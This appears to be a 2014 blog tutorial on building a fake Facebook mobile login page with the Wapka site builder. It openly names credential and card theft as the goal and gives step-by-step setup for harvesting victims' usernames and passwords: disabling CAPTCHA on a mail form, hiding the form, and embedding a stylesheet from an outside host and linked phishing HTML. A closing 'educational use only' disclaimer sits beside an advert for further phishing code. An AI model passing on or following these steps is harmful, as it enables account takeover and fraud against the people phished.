What is Facebook Phishing ??
Phishing is a way of deceiving or cheating your victim by making him login through one of your webpages which is a copy of the original one , but not original fb-login page . By doing so the fake login webpage will save his (victim) E-mail ID or username and password. This is used for criminal activities Like stealing Credits Cards and for getting their login Information . Now we are going to make a fake login page of Facebook Mobile. Lets start the tutorial on How to make facebook phishing page or Fake login page on facebook latest and Best Trick of 2014 .
Steps on how to create fb phishing login page by html code with wapka
Step 1: Register a new Wapka Account First create a new wapka account from the link below. www.wapka.mobi, If you already have then use the existing account .
Step 2: Create a new site to make it your fake page by clicking on 'Create New Site' and then Go to its Admin Mode.
Step 3: Edit Site >>mail form>> **Remember: Enable CAPTCHA pictures: Must UnMark it ..** Now press Submit & Remember Don’t set it admin mode.
step 4 : After collecting the value=”XXXXXXXX” code you Must hide the mailform in Admin Mode. For that Go To
Edit Site >> user >> Items visibility >> Now click on X. Now its Done.
Step 5: Go to Edit Site >> Global Settings >> Headtag Meta style >> Put this below code there . type="text/css” href=”http://skfacebook.wapkamobi/styles.css“/>
Step 6: Now click here for Main Html/Xhtml Code Of Wapka Phishing Page
Step 7: At Last After Finishing All Work/Steps Now you Can Put This Code on your site Now .But For This Code Wapka Advertise will be remove from foot of your site .
Now here's the last Step: Go to EDIT SITE >> WML/XHTML >> PUT The Html/Xhtml code that we copied earlier and paste it all in box and click on Submit button .
Note : This trick is only for Educational use only don't use it As some spam one . Otherwise you should be declared as a violater on facebook and should also Block your Facebook account permanantely .we also have the Latest and Best Autoliker Phishing code of Facebook >>Click me>>